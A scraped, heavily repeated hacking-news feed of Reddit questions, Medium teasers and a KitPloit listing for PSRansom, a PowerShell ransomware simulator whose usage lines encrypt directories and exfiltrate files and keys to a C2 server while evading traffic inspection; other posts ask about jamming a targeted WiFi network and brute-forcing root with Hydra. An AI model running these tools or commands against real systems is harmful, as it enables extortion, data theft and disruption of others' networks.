hacking: security in practice
Jamming target wifi in 500 band?
I have tried the esp3288 and it was good, but the target is not in 204, but 500 band. Is there any other way to target a specific wifi in 500? I don't want to jam the whole neighborhood.
submitted by /u/waskickedtwice
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Jamming target wifi in 500 band?
I have tried the esp3288 and it was good, but the target is not in 204, but 500 band. Is there any other way to target a specific wifi in 500? I don't want to jam the whole neighborhood.
submitted by /u/waskickedtwice
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Jamming target wifi in 500 band?
I have tried the esp3288 and it was good, but the target is not in 204, but 500 band. Is there any other way to target a specific wifi in 500? I...
0d1n
https://www.reddit.com/r/Pentesting/comments/titvme/0d1n/
0d1n is a tool for automating customized attacks against web applications. This tool is significantly faster because it uses thread pool and C language. https://github.com/CoolerVoid/0d1n submitted by /u/CoolerVoid (https://www.reddit.com/user/CoolerVoid)
[link] (https://www.reddit.com/r/Pentesting/comments/titvme/0d1n/) [comments] (https://www.reddit.com/r/Pentesting/comments/titvme/0d1n/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/Pentesting/comments/titvme/0d1n/
0d1n is a tool for automating customized attacks against web applications. This tool is significantly faster because it uses thread pool and C language. https://github.com/CoolerVoid/0d1n submitted by /u/CoolerVoid (https://www.reddit.com/user/CoolerVoid)
[link] (https://www.reddit.com/r/Pentesting/comments/titvme/0d1n/) [comments] (https://www.reddit.com/r/Pentesting/comments/titvme/0d1n/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
0d1n
0d1n is a tool for automating customized attacks against web applications. This tool is significantly faster because it uses thread pool and C...
Pages banned by other pages is still able to take action on event(comment+post)
https://medium.com/@mohamedajimi59/pages-banned-by-other-pages-is-still-able-to-creat-publication-on-event-a13ab0d806c5?source=rss------bug_bounty-5
Vuln Type
Privacy / AuthorizationContinue reading on Medium » (https://medium.com/@mohamedajimi59/pages-banned-by-other-pages-is-still-able-to-creat-publication-on-event-a13ab0d806c5?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@mohamedajimi59/pages-banned-by-other-pages-is-still-able-to-creat-publication-on-event-a13ab0d806c5?source=rss------bug_bounty-5
Vuln Type
Privacy / AuthorizationContinue reading on Medium » (https://medium.com/@mohamedajimi59/pages-banned-by-other-pages-is-still-able-to-creat-publication-on-event-a13ab0d806c5?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
Medium
Pages banned by other pages is still able to creat publication on event
Vuln Type Privacy / Authorization
Pages banned by other pages is still able to take action on event(comment+post)
Vuln Type Privacy / AuthorizationContinue reading on Medium »
Read more...
Vuln Type Privacy / AuthorizationContinue reading on Medium »
Read more...
PSRansom - PowerShell Ransomware Simulator With C2 Server
http://www.kitploit.com/2022/03/psransom-powershell-ransomware.html
___________________________
@hacking_Attack
@Hacking_Video
http://www.kitploit.com/2022/03/psransom-powershell-ransomware.html
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
PSRansom - PowerShell Ransomware Simulator With C2 Server
PSRansom is a PowerShell (https://www.kitploit.com/search/label/PowerShell) Ransomware (https://www.kitploit.com/search/label/Ransomware) Simulator with C2 Server capabilities. This tool helps you simulate encryption (https://www.kitploit.com/search/label/Encryption) process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server, you can exfiltrate files and receive client information via HTTP. All communication between the two elements is encrypted or encoded so as to be undetected (https://www.kitploit.com/search/label/Undetected) by traffic inspection (https://www.kitploit.com/search/label/Traffic%20Inspection) mechanisms, although at no time is HTTPS used at any time.
Requirements PowerShell 4.0 or greater Download It is recommended to clone the complete repository or download the zip file. You can do this by running the following command: git clone https://github.com/JoelGMSec/PSRansom
Usage .\PSRansom -h
____ ____ ____
| _ \/ ___|| _ \ __ _ _ __ ___ ___ _ __ ___
| |_) \___ \| |_) / _' | '_ \/ __|/ _ \| '_ ' _ \
| __/ ___) | _ < (_| | | | \__ \ (_) | | | | | |
|_| |____/|_| \_\__,_|_| |_|___/\___/|_| |_| |_|
----------------- by @JoelGMSec ----------------
Info: This tool helps you simulate encryption process of a
generic ransomware in PowerShell with C2 capabilities
Usage: .\RansomShell.ps1 -e Directory -s C2Server -p C2Port
Encrypt all files & sends recovery key to C2Server
Use -x to exfiltrate and decrypt files on C2Server
.\RansomShell.ps1 -d Directory -k RecoveryKey
Decrypt all files with recovery key string
Warning: All info will be sent to the C2Server without any encryption
You need previously generated recovery key to retrieve files
The detailed guide of use can be found at the following link: https://darkbyte.net/psransom-simulando-un-ransomware-generico-con-powershell License This project is licensed under the GNU 3.0 license - see the LICENSE file for more details. Credits and Acknowledgments This tool has been created and designed from scratch by Joel Gámez Molina // @JoelGMSec Contact This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it. For more information, you can find me on Twitter as @JoelGMSec (https://twitter.com/JoelGMSec) and on my blog darkbyte.net (https://darkbyte.net/).
Download PSRansom (https://github.com/JoelGMSec/PSRansom)
___________________________
@hacking_Attack
@Hacking_Video
Requirements PowerShell 4.0 or greater Download It is recommended to clone the complete repository or download the zip file. You can do this by running the following command: git clone https://github.com/JoelGMSec/PSRansom
Usage .\PSRansom -h
____ ____ ____
| _ \/ ___|| _ \ __ _ _ __ ___ ___ _ __ ___
| |_) \___ \| |_) / _' | '_ \/ __|/ _ \| '_ ' _ \
| __/ ___) | _ < (_| | | | \__ \ (_) | | | | | |
|_| |____/|_| \_\__,_|_| |_|___/\___/|_| |_| |_|
----------------- by @JoelGMSec ----------------
Info: This tool helps you simulate encryption process of a
generic ransomware in PowerShell with C2 capabilities
Usage: .\RansomShell.ps1 -e Directory -s C2Server -p C2Port
Encrypt all files & sends recovery key to C2Server
Use -x to exfiltrate and decrypt files on C2Server
.\RansomShell.ps1 -d Directory -k RecoveryKey
Decrypt all files with recovery key string
Warning: All info will be sent to the C2Server without any encryption
You need previously generated recovery key to retrieve files
The detailed guide of use can be found at the following link: https://darkbyte.net/psransom-simulando-un-ransomware-generico-con-powershell License This project is licensed under the GNU 3.0 license - see the LICENSE file for more details. Credits and Acknowledgments This tool has been created and designed from scratch by Joel Gámez Molina // @JoelGMSec Contact This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it. For more information, you can find me on Twitter as @JoelGMSec (https://twitter.com/JoelGMSec) and on my blog darkbyte.net (https://darkbyte.net/).
Download PSRansom (https://github.com/JoelGMSec/PSRansom)
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Kitploit – Maintenance in Progress
Kitploit is temporarily under maintenance. We’ll be back shortly with improvements.
Hacking on Medium
Cyberspace Samurai
https://cdn-images-1.medium.com/max/800/1*c7hIglgdxeiWmXJXxRrfQg.jpeg
If you acknowledge the foe and recognize yourself, you need not fear the result of a hundred battles. If you recognize yourself merely not…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Cyberspace Samurai
https://cdn-images-1.medium.com/max/800/1*c7hIglgdxeiWmXJXxRrfQg.jpeg
If you acknowledge the foe and recognize yourself, you need not fear the result of a hundred battles. If you recognize yourself merely not…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Cyberspace Samurai
If you acknowledge the foe and recognize yourself, you need not fear the result of a hundred battles. If you recognize yourself merely not…
Hacking on Medium
Getting Started with Kali Linux
https://cdn-images-1.medium.com/max/1365/0*ZeqHCLc9fBGmYVez.png
Kali Linux is a very popular penetration testing platform that provides a variety of security auditing tools used by security specialists…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Getting Started with Kali Linux
https://cdn-images-1.medium.com/max/1365/0*ZeqHCLc9fBGmYVez.png
Kali Linux is a very popular penetration testing platform that provides a variety of security auditing tools used by security specialists…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Getting Started with Kali Linux
Kali Linux is a very popular penetration testing platform that provides a variety of security auditing tools used by security specialists…
Hacking on Medium
ऐथिकल हैकर त्रिशनित अरोङा कैसे बने 2000 करोङ की कम्पनी के मालिक हिन्दी में । How ethical hacker…
https://cdn-images-1.medium.com/max/600/1*dvDtie8CezSQNukLXwxL3A.jpeg
Tag- TAC Security,Trishneet Arora education,TAC Security salary,TAC Security full form ,Trishneet Arora Salary , Trishneet Arora Biography…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
ऐथिकल हैकर त्रिशनित अरोङा कैसे बने 2000 करोङ की कम्पनी के मालिक हिन्दी में । How ethical hacker…
https://cdn-images-1.medium.com/max/600/1*dvDtie8CezSQNukLXwxL3A.jpeg
Tag- TAC Security,Trishneet Arora education,TAC Security salary,TAC Security full form ,Trishneet Arora Salary , Trishneet Arora Biography…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
ऐथिकल हैकर त्रिशनित अरोङा कैसे बने 2000 करोङ की कम्पनी के मालिक हिन्दी में । How ethical hacker Trishnit Arora became the owner…
Tag- TAC Security,Trishneet Arora education,TAC Security salary,TAC Security full form ,Trishneet Arora Salary , Trishneet Arora Biography…
Hacking on Medium
Bad Actors in Information Security
https://cdn-images-1.medium.com/max/700/1*d7tBImJLG_rzj-QbAoxrcg.png
Every day, every hour, people of all ages are in danger. There are several cybercrimes happening at all corners of our life. These crimes…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Bad Actors in Information Security
https://cdn-images-1.medium.com/max/700/1*d7tBImJLG_rzj-QbAoxrcg.png
Every day, every hour, people of all ages are in danger. There are several cybercrimes happening at all corners of our life. These crimes…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Bad Actors in Information Security
Every day, every hour, people of all ages are in danger. There are several cybercrimes happening at all corners of our life. These crimes…
Hacking on Medium
Testing EDRs for Linux — Things I wish I knew before getting started
https://cdn-images-1.medium.com/max/950/0*xZ8MFEzIQJX9j6IM.png
Thoughts on how to simplify your tests while keeping it real and a realistic, easy to expand initial access case.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Testing EDRs for Linux — Things I wish I knew before getting started
https://cdn-images-1.medium.com/max/950/0*xZ8MFEzIQJX9j6IM.png
Thoughts on how to simplify your tests while keeping it real and a realistic, easy to expand initial access case.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Testing EDRs for Linux — Things I wish I knew before getting started
Thoughts on how to simplify your tests while keeping it real and a realistic, easy to expand initial access case.
Pages banned by other pages is still able to take action on event(comment+post)
Vuln Type Privacy / AuthorizationContinue reading on Medium »
Read more...
Vuln Type Privacy / AuthorizationContinue reading on Medium »
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!
PSRansom - PowerShell Ransomware Simulator With C2 Server
https://blogger.googleusercontent.com/img/a/AVvXsEiFAhtUC9yvejiGluvRxk1idCkAzTTYJuzXc7xVJfOxCZNWY4WuuYtBoRZGHX-99Vso9SZLdDBDYu9A6ZwD374mD6EUE43vprR2hvle8W7TxYenLGJYWmvDAIPwFEqh1SPUb7KzJYZ_DBG3A1V1bKisx2eIfL3fcRmo9sX4JjMvg8X3em9qB5fhVJS_=w640-h400
PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server, you can exfiltrate files and receive client information via HTTP.
All communication between the two elements is encrypted or encoded so as to be undetected by traffic inspection mechanisms, although at no time is HTTPS used at any time.
Requirements
* PowerShell 4.0 or greater
Download
It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:
Usage
The detailed guide of use can be found at the following link:
https://darkbyte.net/psransom-simulando-un-ransomware-generico-con-powershell
License
This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.
Credits and Acknowledgments
This tool has been created and designed from scratch by Joel Gámez Molina // @JoelGMSec
Contact
This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.
For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.
Download PSRansom
___________________________
@hacking_Attack
@Hacking_Video
PSRansom - PowerShell Ransomware Simulator With C2 Server
https://blogger.googleusercontent.com/img/a/AVvXsEiFAhtUC9yvejiGluvRxk1idCkAzTTYJuzXc7xVJfOxCZNWY4WuuYtBoRZGHX-99Vso9SZLdDBDYu9A6ZwD374mD6EUE43vprR2hvle8W7TxYenLGJYWmvDAIPwFEqh1SPUb7KzJYZ_DBG3A1V1bKisx2eIfL3fcRmo9sX4JjMvg8X3em9qB5fhVJS_=w640-h400
PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server, you can exfiltrate files and receive client information via HTTP.
All communication between the two elements is encrypted or encoded so as to be undetected by traffic inspection mechanisms, although at no time is HTTPS used at any time.
Requirements
* PowerShell 4.0 or greater
Download
It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:
git clone https://github.com/JoelGMSec/PSRansom
Usage
.\PSRansom -h
____ ____ ____
| _ \/ ___|| _ \ __ _ _ __ ___ ___ _ __ ___
| |_) \___ \| |_) / _' | '_ \/ __|/ _ \| '_ ' _ \
| __/ ___) | _ < (_| | | | \__ \ (_) | | | | | |
|_| |____/|_| \_\__,_|_| |_|___/\___/|_| |_| |_|
----------------- by @JoelGMSec ----------------
Info: This tool helps you simulate encryption process of a
generic ransomware in PowerShell with C2 capabilities
Usage: .\RansomShell.ps1 -e Directory -s C2Server -p C2Port
Encrypt all files & sends recovery key to C2Server
Use -x to exfiltrate and decrypt files on C2Server
.\RansomShell.ps1 -d Directory -k RecoveryKey
Decrypt all files with recovery key string
Warning: All info will be sent to the C2Server without any encryption
You need previously generated recovery key to retrieve files
The detailed guide of use can be found at the following link:
https://darkbyte.net/psransom-simulando-un-ransomware-generico-con-powershell
License
This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.
Credits and Acknowledgments
This tool has been created and designed from scratch by Joel Gámez Molina // @JoelGMSec
Contact
This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.
For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.
Download PSRansom
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
PSRansom - PowerShell Ransomware Simulator With C2 Server
hacking: security in practice
Youtube
Is there a script to ban certain youtube channels / keywords from showing in youtube algorithm video suggestions?
submitted by /u/username9515
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Youtube
Is there a script to ban certain youtube channels / keywords from showing in youtube algorithm video suggestions?
submitted by /u/username9515
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Youtube
Is there a script to ban certain youtube channels / keywords from showing in youtube algorithm video suggestions?
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
I finished my first blog post and would like your opinion about it. Feel free to say what I got wrong since I'm no expert in this field.
https://external-preview.redd.it/J9tNlC4LV7hwB1YX9md6ENCoMp5h3DJ3m1icXKC50_4.jpg?width=640&crop=smart&auto=webp&s=ed55b9b22a9a97ad5f678cba5ee8b736a1223c1e submitted by /u/DeadlyC14
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
I finished my first blog post and would like your opinion about it. Feel free to say what I got wrong since I'm no expert in this field.
https://external-preview.redd.it/J9tNlC4LV7hwB1YX9md6ENCoMp5h3DJ3m1icXKC50_4.jpg?width=640&crop=smart&auto=webp&s=ed55b9b22a9a97ad5f678cba5ee8b736a1223c1e submitted by /u/DeadlyC14
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
I finished my first blog post and would like your opinion about...
Posted in r/hacking by u/DeadlyC14 • 1 point and 0 comments
hacking: security in practice
Kali Linux on a macbook pro with parallels
When I’m switching from an external monitor to the screen of the laptop. The resolution of kali linux doesnt scale right. Does someone have tips?
submitted by /u/overigegebruiker12
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux on a macbook pro with parallels
When I’m switching from an external monitor to the screen of the laptop. The resolution of kali linux doesnt scale right. Does someone have tips?
submitted by /u/overigegebruiker12
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Kali Linux on a macbook pro with parallels
When I’m switching from an external monitor to the screen of the laptop. The resolution of kali linux doesnt scale right. Does someone have tips?
hacking: security in practice
Hydra hacking
I’m testing hydra cuz I know how to use it but never really try use it, and I tried hacking my Linux account(like root) and wtf am I supposed to put in the ftp thing part
Cuz it isn’t http/https/ftp “Hydra -l “root” -P ‘’.txt \ ‘’ 127.0.0.1 “ (Not acc ip) But where do I put in the part before the 127.0.0.1(not real ip) part
submitted by /u/retro_Ztro
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Hydra hacking
I’m testing hydra cuz I know how to use it but never really try use it, and I tried hacking my Linux account(like root) and wtf am I supposed to put in the ftp thing part
Cuz it isn’t http/https/ftp “Hydra -l “root” -P ‘’.txt \ ‘’ 127.0.0.1 “ (Not acc ip) But where do I put in the part before the 127.0.0.1(not real ip) part
submitted by /u/retro_Ztro
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Hydra hacking
I’m testing hydra cuz I know how to use it but never really try use it, and I tried hacking my Linux account(like root) and wtf am I supposed to...
PSRansom - PowerShell Ransomware Simulator With C2 Server
PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server, you can exfiltrate files and receive client information via HTTP. All communication between the two elements is encrypted or encoded so as to be undetected by traffic inspection mechanisms, although at no time is HTTPS used at any time. Requirements PowerShell 4.0 or greater Download It is recommended to clone the complete repository or download the zip file. You can do this by running the following command: git clone https://github.com/JoelGMSec/PSRansom Usage .\PSRansom -h | \/ || \ | |) _ \| |) / ' | ' \/ |/ \| ' ' \ | / ) | \ < (_| | | | \_ \ () | | | | | | |\| |_/|_| \_\_,_|_| |_|_/\_/|_| |_| |_| ----------------- by @JoelGMSec ---------------- Info: This tool helps you simulate encryption process of a generic ransomware in PowerShell with C2 capabilities Usage: .\RansomShell.ps1 -e Directory -s C2Server -p C2Port Encrypt all files & sends recovery key to C2Server Use -x to exfiltrate and decrypt files on C2Server .\RansomShell.ps1 -d Directory -k RecoveryKey Decrypt all files with recovery key string Warning: All info will be sent to the C2Server without any encryption You need previously generated recovery key to retrieve files The detailed guide of use can be found at the following link: https://darkbyte.net/psransom-simulando-un-ransomware-generico-con-powershell License This project is licensed under the GNU 3.0 license - see the LICENSE file for more details. Credits and Acknowledgments This tool has been created and designed from scratch by Joel Gámez Molina // @JoelGMSec Contact This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it. For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net. Download PSRansom
Read more...
___________________________
@hacking_Attack
@Hacking_Video
PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server, you can exfiltrate files and receive client information via HTTP. All communication between the two elements is encrypted or encoded so as to be undetected by traffic inspection mechanisms, although at no time is HTTPS used at any time. Requirements PowerShell 4.0 or greater Download It is recommended to clone the complete repository or download the zip file. You can do this by running the following command: git clone https://github.com/JoelGMSec/PSRansom Usage .\PSRansom -h | \/ || \ | |) _ \| |) / ' | ' \/ |/ \| ' ' \ | / ) | \ < (_| | | | \_ \ () | | | | | | |\| |_/|_| \_\_,_|_| |_|_/\_/|_| |_| |_| ----------------- by @JoelGMSec ---------------- Info: This tool helps you simulate encryption process of a generic ransomware in PowerShell with C2 capabilities Usage: .\RansomShell.ps1 -e Directory -s C2Server -p C2Port Encrypt all files & sends recovery key to C2Server Use -x to exfiltrate and decrypt files on C2Server .\RansomShell.ps1 -d Directory -k RecoveryKey Decrypt all files with recovery key string Warning: All info will be sent to the C2Server without any encryption You need previously generated recovery key to retrieve files The detailed guide of use can be found at the following link: https://darkbyte.net/psransom-simulando-un-ransomware-generico-con-powershell License This project is licensed under the GNU 3.0 license - see the LICENSE file for more details. Credits and Acknowledgments This tool has been created and designed from scratch by Joel Gámez Molina // @JoelGMSec Contact This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it. For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net. Download PSRansom
Read more...
___________________________
@hacking_Attack
@Hacking_Video
GitHub
GitHub - JoelGMSec/PSRansom: PowerShell Ransomware Simulator with C2 Server
PowerShell Ransomware Simulator with C2 Server. Contribute to JoelGMSec/PSRansom development by creating an account on GitHub.